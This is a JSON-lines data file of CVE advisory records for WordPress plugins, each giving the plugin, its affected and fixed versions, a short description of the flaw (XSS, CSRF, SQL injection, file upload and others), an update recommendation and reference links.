{"CVE_ID":"CVE-2025-0864","slug":"profit-products-tables-for-woocommerce","versionImpact":"1.0.6.6","versionEndExcluding":"1.0.6.7","description":"The Active Products Tables for WooCommerce. Use constructor to create tables plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'shortcodes_set' parameter in all versions up to, and including, 1.0.6.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.0.6.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profit-products-tables-for-woocommerce\\\/trunk\\\/index.php#L1624\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profit-products-tables-for-woocommerce\\\/trunk\\\/index.php#L1624\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profit-products-tables-for-woocommerce\\\/trunk\\\/index.php#L88\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profit-products-tables-for-woocommerce\\\/trunk\\\/index.php#L88\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3235888%40profit-products-tables-for-woocommerce&new=3235888%40profit-products-tables-for-woocommerce&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3235888%40profit-products-tables-for-woocommerce&new=3235888%40profit-products-tables-for-woocommerce&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f93dcb51-1caf-4d63-a8f3-f6251dd0d19f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f93dcb51-1caf-4d63-a8f3-f6251dd0d19f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0797","slug":"profit-products-tables-for-woocommerce","versionImpact":"1.0.6.1","versionEndExcluding":"1.0.6.2","description":"The Active Products Tables for WooCommerce. Professional products tables for WooCommerce store plugin for WordPress is vulnerable to unauthorized access of functionality due to a missing capability check on several functions in all versions up to, and including, 1.0.6.1. This makes it possible for subscribers and higher to execute functions intended for admin use.","recommendation":"Update to version 1.0.6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a94841f-b1dd-44f4-b7a1-65a9fdf7b18d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a94841f-b1dd-44f4-b7a1-65a9fdf7b18d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3029488\\\/profit-products-tables-for-woocommerce\\\/trunk?contextall=1&old=3005088&old_path=%2Fprofit-products-tables-for-woocommerce%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3029488\\\/profit-products-tables-for-woocommerce\\\/trunk?contextall=1&old=3005088&old_path=%2Fprofit-products-tables-for-woocommerce%2Ftrunk\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0796","slug":"profit-products-tables-for-woocommerce","versionImpact":"1.0.6.1","versionEndExcluding":"1.0.6.2","description":"The Active Products Tables for WooCommerce. Professional products tables for WooCommerce store plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.6.1. This is due to missing or incorrect nonce validation on several functions corresponding to AJAX actions. This makes it possible for unauthenticated attackers to invoke those functions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.0.6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5069fbc4-b3c4-4c0b-892c-2c83f35dc2fe?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5069fbc4-b3c4-4c0b-892c-2c83f35dc2fe?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3029488\\\/profit-products-tables-for-woocommerce\\\/trunk?contextall=1&old=3005088&old_path=%2Fprofit-products-tables-for-woocommerce%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3029488\\\/profit-products-tables-for-woocommerce\\\/trunk?contextall=1&old=3005088&old_path=%2Fprofit-products-tables-for-woocommerce%2Ftrunk\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13601","slug":"majestic-support","versionImpact":"1.0.5","versionEndExcluding":"1.0.6","description":"The Majestic Support \u2013 The Leading-Edge Help Desk & Customer Support Plugin plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.0.5 via the 'exportusereraserequest' function due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to export ticket data for any user.","recommendation":"Update to version 1.0.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/majestic-support\\\/tags\\\/1.0.5\\\/modules\\\/gdpr\\\/controller.php#L110\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/majestic-support\\\/tags\\\/1.0.5\\\/modules\\\/gdpr\\\/controller.php#L110\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231938\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231938\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ebf5537d-d80e-4844-8ed4-480f4a533439?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ebf5537d-d80e-4844-8ed4-480f4a533439?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13600","slug":"majestic-support","versionImpact":"1.0.5","versionEndExcluding":"1.0.6","description":"The Majestic Support \u2013 The Leading-Edge Help Desk & Customer Support Plugin plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0.5 via the 'majesticsupportdata' directory. This makes it possible for unauthenticated attackers to extract sensitive data stored insecurely in the \/wp-content\/uploads\/majesticsupportdata directory which can contain file attachments included in support tickets.","recommendation":"Update to version 1.0.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/majestic-support\\\/tags\\\/1.0.5\\\/includes\\\/classes\\\/uploads.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/majestic-support\\\/tags\\\/1.0.5\\\/includes\\\/classes\\\/uploads.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231938\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231938\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5a8fd90-49dd-4a5e-88f2-cd6b338da2d6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5a8fd90-49dd-4a5e-88f2-cd6b338da2d6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10789","slug":"wp-user-profile-avatar","versionImpact":"1.0.5","versionEndExcluding":"1.0.6","description":"The WP User Profile Avatar plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.5. This is due to missing or incorrect nonce validation on the wpupa_user_admin() function. This makes it possible for unauthenticated attackers to update the plugins setting which controls access to the functionality via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.0.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3222923\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3222923\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b056cc98-3bd8-493a-bbf4-9bcee2e52d24?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b056cc98-3bd8-493a-bbf4-9bcee2e52d24?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1089","slug":"coupon-zen","versionEndExcluding":"1.0.6","description":"The Coupon Zen WordPress plugin before 1.0.6 does not have CSRF check when activating plugins, which could allow attackers to make logged in admins activate arbitrary plugins present on the blog via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9787e26f-33fe-4c65-abb3-7f5c76ae8d6f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9787e26f-33fe-4c65-abb3-7f5c76ae8d6f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9575","slug":"pretix-widget","versionImpact":"1.0.5","versionEndExcluding":"1.0.6","description":"Local File Inclusion vulnerability in pretix Widget WordPress plugin pretix-widget on Windows allows PHP Local File Inclusion. This issue affects pretix Widget WordPress plugin: from 1.0.0 through 1.0.5.","recommendation":"Update to version 1.0.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/pretix.eu\\\/about\\\/en\\\/blog\\\/20241009-wordpress-plugin-1-0-6\\\/\",\"name\":\"https:\\\/\\\/pretix.eu\\\/about\\\/en\\\/blog\\\/20241009-wordpress-plugin-1-0-6\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0453","slug":"wp-private-message","versionEndExcluding":"1.0.6","description":"The WP Private Message WordPress plugin (bundled with the Superio theme as a required plugin) before 1.0.6 does not ensure that private messages to be accessed belong to the user making the requests. This allowing any authenticated users to access private messages belonging to other users by tampering the ID.","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/superio-job-board-wordpress-theme\\\/32180231\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/superio-job-board-wordpress-theme\\\/32180231\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f915e5ac-e216-4d1c-aec1-c3be11e2a6de\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f915e5ac-e216-4d1c-aec1-c3be11e2a6de\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13672","slug":"mini-course-generator","versionImpact":"1.0.5","versionEndExcluding":"1.0.6","description":"The Mini Course Generator | Embed mini-courses and interactive content plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'mcg' shortcode in all versions up to, and including, 1.0.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.0.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mini-course-generator\\\/tags\\\/1.0.4\\\/includes\\\/class-mcg-shortcodes.php#L10\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mini-course-generator\\\/tags\\\/1.0.4\\\/includes\\\/class-mcg-shortcodes.php#L10\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3243023%40mini-course-generator&new=3243023%40mini-course-generator&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3243023%40mini-course-generator&new=3243023%40mini-course-generator&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b47505a5-fb7f-4e41-a6de-6f0b330aa495?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b47505a5-fb7f-4e41-a6de-6f0b330aa495?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6244","slug":"pz-frontend-manager","versionImpact":"1.0.5","versionEndExcluding":"1.0.6","description":"The PZ Frontend Manager WordPress plugin before 1.0.6 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks","recommendation":"Update to version 1.0.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/73ba55a5-6cff-40fc-9686-30c50f060732\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/73ba55a5-6cff-40fc-9686-30c50f060732\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1614","slug":"wp-custom-author-url","versionEndExcluding":"1.0.5","description":"The WP Custom Author URL WordPress plugin before 1.0.5 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/56abd1e2-0ea9-47f7-9a1b-2093ac15d39c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/56abd1e2-0ea9-47f7-9a1b-2093ac15d39c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13714","slug":"all-images-ai","versionImpact":"1.0.4","versionEndExcluding":"1.0.5","description":"The All-Images.ai \u2013 IA Image Bank and Custom Image creation plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the '_get_image_by_url' function in all versions up to, and including, 1.0.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 1.0.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3231889%40all-images-ai&new=3231889%40all-images-ai&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3231889%40all-images-ai&new=3231889%40all-images-ai&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/422c634c-5119-40ef-adf7-681c3d8c09a2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/422c634c-5119-40ef-adf7-681c3d8c09a2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2019-25222","slug":"wp-responsive-thumbnail-slider","versionImpact":"1.0.4","versionEndExcluding":"1.0.5","description":"The Thumbnail carousel slider plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter in all versions up to, and including, 1.0.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.0.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-responsive-thumbnail-slider\\\/tags\\\/1.0.4\\\/wp-responsive-images-thumbnail-slider.php#L1326\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-responsive-thumbnail-slider\\\/tags\\\/1.0.4\\\/wp-responsive-images-thumbnail-slider.php#L1326\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-responsive-thumbnail-slider\\\/tags\\\/1.0.5\\\/wp-responsive-images-thumbnail-slider.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-responsive-thumbnail-slider\\\/tags\\\/1.0.5\\\/wp-responsive-images-thumbnail-slider.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-responsive-thumbnail-slider\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-responsive-thumbnail-slider\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6023483-3fa5-4b85-9422-7d395abcfbd8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6023483-3fa5-4b85-9422-7d395abcfbd8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-24563","slug":"cleanup-light","versionImpact":"1.0.4","versionEndExcluding":"1.0.5","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeGlow Cleanup \u2013 Directory Listing & Classifieds WordPress Plugin allows Reflected XSS. This issue affects Cleanup \u2013 Directory Listing & Classifieds WordPress Plugin: from n\/a through 1.0.4.","recommendation":"Update to version 1.0.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/cleanup-light\\\/vulnerability\\\/wordpress-cleanup-directory-listing-classifieds-plugin-1-0-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/cleanup-light\\\/vulnerability\\\/wordpress-cleanup-directory-listing-classifieds-plugin-1-0-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4455","slug":"smart-product-review","versionImpact":"1.0.4","versionEndExcluding":"1.0.5","description":"The Wordpress Plugin Smart Product Review plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in all versions up to, and including, 1.0.4. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 1.0.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.exploit-db.com\\\/exploits\\\/50533\",\"name\":\"https:\\\/\\\/www.exploit-db.com\\\/exploits\\\/50533\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1de9183c-95b9-4500-85e2-08dcee956360?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1de9183c-95b9-4500-85e2-08dcee956360?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10690","slug":"shortcode-elementor","versionImpact":"1.0.4","versionEndExcluding":"1.0.5","description":"The Shortcodes for Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.0.4 via the 'SHORTCODE_ELEMENTOR' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private and draft posts created with Elementor that they should not have access to.","recommendation":"Update to version 1.0.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207001%40shortcode-elementor&new=3207001%40shortcode-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207001%40shortcode-elementor&new=3207001%40shortcode-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5debe121-6373-4b56-8441-f0d4a5920089?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5debe121-6373-4b56-8441-f0d4a5920089?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6058","slug":"wpbookit","versionImpact":"1.0.4","versionEndExcluding":"1.0.5","description":"The WPBookit plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the image_upload_handle() function hooked via the 'add_booking_type' route in all versions up to, and including, 1.0.4. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 1.0.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpbookit\\\/trunk\\\/core\\\/admin\\\/classes\\\/controllers\\\/class.wpb-booking-type-controller.php#L455\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpbookit\\\/trunk\\\/core\\\/admin\\\/classes\\\/controllers\\\/class.wpb-booking-type-controller.php#L455\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3314288%40wpbookit&new=3314288%40wpbookit&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3314288%40wpbookit&new=3314288%40wpbookit&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d779ad1-fdbe-444c-85c5-99146a1a03d8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1d779ad1-fdbe-444c-85c5-99146a1a03d8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11369","slug":"store-credit-for-woocommerce","versionImpact":"1.0.49.46","versionEndExcluding":"1.0.49.47","description":"The Store credit \/ Gift cards for woocommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'coupon', 'start_date', and 'end_date' parameters in all versions up to, and including, 1.0.49.46 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.0.49.47, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-credit-for-woocommerce\\\/tags\\\/1.0.49.42\\\/admin\\\/report.php#L113\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-credit-for-woocommerce\\\/tags\\\/1.0.49.42\\\/admin\\\/report.php#L113\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-credit-for-woocommerce\\\/tags\\\/1.0.49.42\\\/admin\\\/report.php#L119\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-credit-for-woocommerce\\\/tags\\\/1.0.49.42\\\/admin\\\/report.php#L119\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-credit-for-woocommerce\\\/tags\\\/1.0.49.42\\\/admin\\\/report.php#L95\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-credit-for-woocommerce\\\/tags\\\/1.0.49.42\\\/admin\\\/report.php#L95\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3213698\\\/store-credit-for-woocommerce\\\/trunk\\\/admin\\\/report.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3213698\\\/store-credit-for-woocommerce\\\/trunk\\\/admin\\\/report.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e8527c0-a4b0-436d-901a-c07f93c7ec5e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e8527c0-a4b0-436d-901a-c07f93c7ec5e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12809","slug":"wishlist","versionImpact":"1.0.43","versionEndExcluding":"1.0.44","description":"The Wishlist plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wishlist_button' shortcode in all versions up to, and including, 1.0.43 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.0.44, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wishlist\\\/trunk\\\/includes\\\/classes\\\/class-shortcodes.php?rev=3215801#L223\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wishlist\\\/trunk\\\/includes\\\/classes\\\/class-shortcodes.php?rev=3215801#L223\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3242533%40wishlist&new=3242533%40wishlist&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3242533%40wishlist&new=3242533%40wishlist&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3251476%40wishlist&new=3251476%40wishlist&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3251476%40wishlist&new=3251476%40wishlist&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1b902d46-ff27-486f-836d-f55a8048f08c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1b902d46-ff27-486f-836d-f55a8048f08c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4760","slug":"oneclick-whatsapp-order","versionEndExcluding":"1.0.4.2","description":"The OneClick Chat to Order WordPress plugin before 1.0.4.2 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ad710c22-878a-441b-9c5a-90511b913d9d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ad710c22-878a-441b-9c5a-90511b913d9d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6721","slug":"mrkv-vchasno-kasa","versionImpact":"1.0.3","versionEndExcluding":"1.0.4","description":"The Vchasno Kasa plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the mrkv_vchasno_kasa_wc_do_metabox_action() function in all versions up to, and including, 1.0.3. This makes it possible for unauthenticated attackers to generate invoices for arbitrary orders.","recommendation":"Update to version 1.0.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mrkv-vchasno-kasa\\\/trunk\\\/classes\\\/mrkv-setup.php#L395\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mrkv-vchasno-kasa\\\/trunk\\\/classes\\\/mrkv-setup.php#L395\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3328827%40mrkv-vchasno-kasa&new=3328827%40mrkv-vchasno-kasa&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3328827%40mrkv-vchasno-kasa&new=3328827%40mrkv-vchasno-kasa&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57ad3525-3257-4727-ba07-468bf13a94e2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57ad3525-3257-4727-ba07-468bf13a94e2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
